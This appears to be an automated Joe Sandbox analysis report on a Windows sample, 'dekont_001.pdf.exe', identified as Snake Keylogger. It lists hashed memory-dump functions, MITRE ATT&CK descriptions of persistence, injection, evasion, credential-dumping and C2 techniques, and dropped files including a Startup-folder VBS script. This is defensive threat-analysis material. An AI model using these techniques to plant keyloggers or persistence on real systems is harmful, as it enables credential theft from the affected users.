Instruction Fuzzy Hash: 8821C3353016258FD715AA29C49452FBBB6FBC86557048179E906DB394CF34DD02CBC1

Function 017D215C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc52e54b771ca4afc07bbd2522ceab3826b3d8e1381c819ad5499d922e8cfd6f
Instruction ID: 563757636c5852c59d889621293169faeeed3d1aabf6727660b486d690198f20
Opcode Fuzzy Hash: fc52e54b771ca4afc07bbd2522ceab3826b3d8e1381c819ad5499d922e8cfd6f
Instruction Fuzzy Hash: BB115C35E0824D9FCB029BF8AC104DEFB35EF8A2107258796D666B7092EA351846C352

Function 017D4DB9 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9208269c7076fc0cc7359fe66b20906ca2c342711543a84b6de2b7ea64e0442a
Instruction ID: 7d397f00ec2899828315e9687eafcb8a6cd55d297a924792e09a19737cac26f2
Opcode Fuzzy Hash: 9208269c7076fc0cc7359fe66b20906ca2c342711543a84b6de2b7ea64e0442a
Instruction Fuzzy Hash: D821C07574521EEFCB169F69E844B6B7BE2EB48714F004468F9168B684CB38CD51CBE0

Function 06B496F0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1b8b81546831922df55cd59e65c1b8e5d6b4f805a5e6b64a50347e2c477f65a
Instruction ID: 627866cdf398be8d29c0814955ab289d27888848bd5b434bea12012b87aa4496
Opcode Fuzzy Hash: a1b8b81546831922df55cd59e65c1b8e5d6b4f805a5e6b64a50347e2c477f65a
Instruction Fuzzy Hash: 371127367083645FCB46AFB8982427E3FE7EFC8250B15486AD505DB3C1DE398E0283A1

Function 017DD60F Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6844d094aa6f59b97793f4bd7f8d7999221a406ddb7d386d10f797b8c480b613
Instruction ID: ed017eda8d0d720d11cd999d87114fccaa128114b390ee115d47c1ee737f3db7
Opcode Fuzzy Hash: 6844d094aa6f59b97793f4bd7f8d7999221a406ddb7d386d10f797b8c480b613
Instruction Fuzzy Hash: E1116DB1E006089BDB18CFEAD8056DEFBF3EBC9310F08D029D418B7295DB7449068E90

Function 017DE201 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29e565bf93b9dd8608403c071ae58046fd0c1e29bacbd5562d6c3c1490831fa6
Instruction ID: bdd879b14e8ec4e6d9e05385ca765f02589ad140c67d8e7197362f6dac13c4ee
Opcode Fuzzy Hash: 29e565bf93b9dd8608403c071ae58046fd0c1e29bacbd5562d6c3c1490831fa6
Instruction Fuzzy Hash: 73212970D0120DDFDB45EFB9D58069EBBF2FB44304F0095A9D0149B365EB749A898B81

Function 017D1F61 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17db7cf4587aaa1e9026edeaf3db36d2ac584439f626825bdced08e6eba04628
Instruction ID: c4063c01b96de769c25abfd1838fc89087f3c3eae0c910abab918e1e25f51e46
Opcode Fuzzy Hash: 17db7cf4587aaa1e9026edeaf3db36d2ac584439f626825bdced08e6eba04628
Instruction Fuzzy Hash: A721D0B9D0160A8FCB40EFA9D9856EEBBF0FF08300F10916AD805B2214EB355A45CBA1

Function 017DE208 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1424b324676cf14479855162a1b6d3896ba1f94bd111a3a7b30727d06fb56df7
Instruction ID: 18437825d0a306226e5ab3380c693a02a203cc6fe202b1c780be9e4161d07d30
Opcode Fuzzy Hash: 1424b324676cf14479855162a1b6d3896ba1f94bd111a3a7b30727d06fb56df7
Instruction Fuzzy Hash: 0F113A70D0020DDFDB45EFBDD58069EBBF2FB44304F0095A9D0149B364EB749A898B81

Function 06B48EC1 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a45e12129e2d3cd37a8ba1fe4dc0b4249161fc8de6f5cda1d26787123024e86
Instruction ID: 1df173d584f29532e0324b5f49546f930cbba380b9bc30c1d403fb98220b828f
Opcode Fuzzy Hash: 9a45e12129e2d3cd37a8ba1fe4dc0b4249161fc8de6f5cda1d26787123024e86
Instruction Fuzzy Hash: 7E110074F011498FEB00DFFCD850BAEBBB6AB58315F009595E908EB349EB30D9428B51

Function 017D5607 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c121117296a7338c5b4080b96c1805785506f602a352ca382057ee79c03a2431
Instruction ID: aac7b1e01a7f5f4d7b5cb4013ab4e597ab45510aaf3c5b62523d579ed069f322
Opcode Fuzzy Hash: c121117296a7338c5b4080b96c1805785506f602a352ca382057ee79c03a2431
Instruction Fuzzy Hash: 540128B27042196FCB02DE68D804AEF7FFADBD9750B19806AF505D7280DA75CD0287A1

Function 017D1F08 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7952f3b072094efa45ba4f5f6090ccbe2114b1c5246e00e6b02d1f25678ebf2
Instruction ID: efbac05483914522bb14b8e8a3f590415170c5c73cbfa8320e0c602f968e16e0
Opcode Fuzzy Hash: c7952f3b072094efa45ba4f5f6090ccbe2114b1c5246e00e6b02d1f25678ebf2
Instruction Fuzzy Hash: 3B2167B4D016098FCB01EFA8D5485EEBFF0BF0A310F1081AAD445B7264EB301A85CB91

Function 06B42670 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2940494066.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6b40000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e8a6eeaed3c00a00cc4b0d9072b3d8b99270e8a556e687787f9468ce347c39
Instruction ID: b30d9f1339fba758ce055f155cb9e06f4a4790ffe536fc694eb6ba0554a7a4b9
Opcode Fuzzy Hash: 48e8a6eeaed3c00a00cc4b0d9072b3d8b99270e8a556e687787f9468ce347c39
Instruction Fuzzy Hash: 1D11ADB5A002228FC794EF7DE50865EBBF5EF88610B0000A9F415DB321EB32CE059B90

Function 017DD449 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 297eae39d3813e84ea23682ce4d85999e294717e763e0b7d4089d739d84e5ef3
Instruction ID: 97d7a21db1ba74eafc0f519fe9878892cbabaa8a98b7855abbfddb8c89eb7656
Opcode Fuzzy Hash: 297eae39d3813e84ea23682ce4d85999e294717e763e0b7d4089d739d84e5ef3
Instruction Fuzzy Hash: 0DE06870E0010AABD7159AE9EC0E3FAFB78D786310F00A038E504E32D4EBB0A5058A91

Function 017DDEB0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f78729020ae755f5cefb507024af9b95e21581041e9131cfeb8907342f3d329b
Instruction ID: 36b452728b129dc0e9b22dd899809d1ef0725fd2f023e47cf4b87c9958364de6
Opcode Fuzzy Hash: f78729020ae755f5cefb507024af9b95e21581041e9131cfeb8907342f3d329b
Instruction Fuzzy Hash: 36F03A70A11129CFCB94EFBCC44459EBBF0AF0C21072144A9D409DB361EB30D9018BD0

Function 017DDF08 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8691136a8b125a017a2b374f166fa5771954fa347d78541953dabfaab3bc0fb
Instruction ID: ae4478ccdf34b7f6f37ccc1f08bc9569f3a51c7b25650cd2c882dcfd3cc94aa4
Opcode Fuzzy Hash: d8691136a8b125a017a2b374f166fa5771954fa347d78541953dabfaab3bc0fb
Instruction Fuzzy Hash: 40E02230D00309DFCB24CEA8E4592FBBBB5EBCA312F00A469E104A31A0DBB08506CA40

Function 017DD4B4 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1ba37848edc93d400c39089250afdb731511ecc23a7d075d911b4de4cfebe5a
Instruction ID: f8e6db2c0c68da8f72419582963736fd44adb90707905aaa50ba1905d8372945
Opcode Fuzzy Hash: e1ba37848edc93d400c39089250afdb731511ecc23a7d075d911b4de4cfebe5a
Instruction Fuzzy Hash: 2FE0DFE2C09148DAD3318BEAE4160B8FF70C9E3211B8460D7D4898B1A5D614E2069B11

Function 017D2010 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e31e7967dbfefdb45887375039cd8a35fc65def589790150d909a083c1c9c0
Instruction ID: e34209186b8d856c4c736198e9d1b906ceccc59886cc4b945564232c1a094292
Opcode Fuzzy Hash: a7e31e7967dbfefdb45887375039cd8a35fc65def589790150d909a083c1c9c0
Instruction Fuzzy Hash: 1BE0DF3292022A57CB00EAA8EC116DFB378EF91224F408522D46436100EB70624A82A2

Function 017D2020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22eeff377767efd9018c6b9bd4fc4bb60079bfe866772384550bc4fc75799175
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 22eeff377767efd9018c6b9bd4fc4bb60079bfe866772384550bc4fc75799175
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 017D8258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 0858e3c2726b315149eed0dcc8851a5118369bc94f8629de169a594a139204b6
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: A7C0123320C1282AA725108E7C41AA7AB9CC2C12B4A2502B7F95CA3200A842AC8001AA

Function 017DA70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e92178fea15bb141ed207c18b14ee6c13f07003249cc0148edd91b2c1c331fea
Instruction ID: d363a3b84d33bd2b60293db96ee735be28c5dae46f99c05cc1d93815c860de07
Opcode Fuzzy Hash: e92178fea15bb141ed207c18b14ee6c13f07003249cc0148edd91b2c1c331fea
Instruction Fuzzy Hash: F8D0677AB41018DFCF049F99E8408DDB7B6FB9C221B148116E915A3265C6319921DB54

Function 017D5EA8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c40c60fe4dc034939b669365e9899f9025369cf50a53171d6310f1034262bb
Instruction ID: cd405eb56f6b33171cb51ea3bdea1ec69a8c047f618d53545d3e1597cec02635
Opcode Fuzzy Hash: c6c40c60fe4dc034939b669365e9899f9025369cf50a53171d6310f1034262bb
Instruction Fuzzy Hash: BAD02B715083458FC201F339EA140057B29F580208BC041E8E8050A59FEF7C8C8E8751

Function 017D5EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2932887031.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_17d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62b7ae4011cb099baec672be4167ca0a8bb96021663bbd15b3c54b097ebefa6
Instruction ID: aada1f4042ea432e55bdb3bed51df8c5ef6c5aa1e1097af86378faace6715693
Opcode Fuzzy Hash: b62b7ae4011cb099baec672be4167ca0a8bb96021663bbd15b3c54b097ebefa6
Instruction Fuzzy Hash: 2BC0123125430A8FC541F77AEB45555776AF6C0308F408568E4090626EDF7CDDC84690

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dekont_001.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Id.exe

C:\Users\user\AppData\Roaming\Id.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
dekont_001.pdf.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre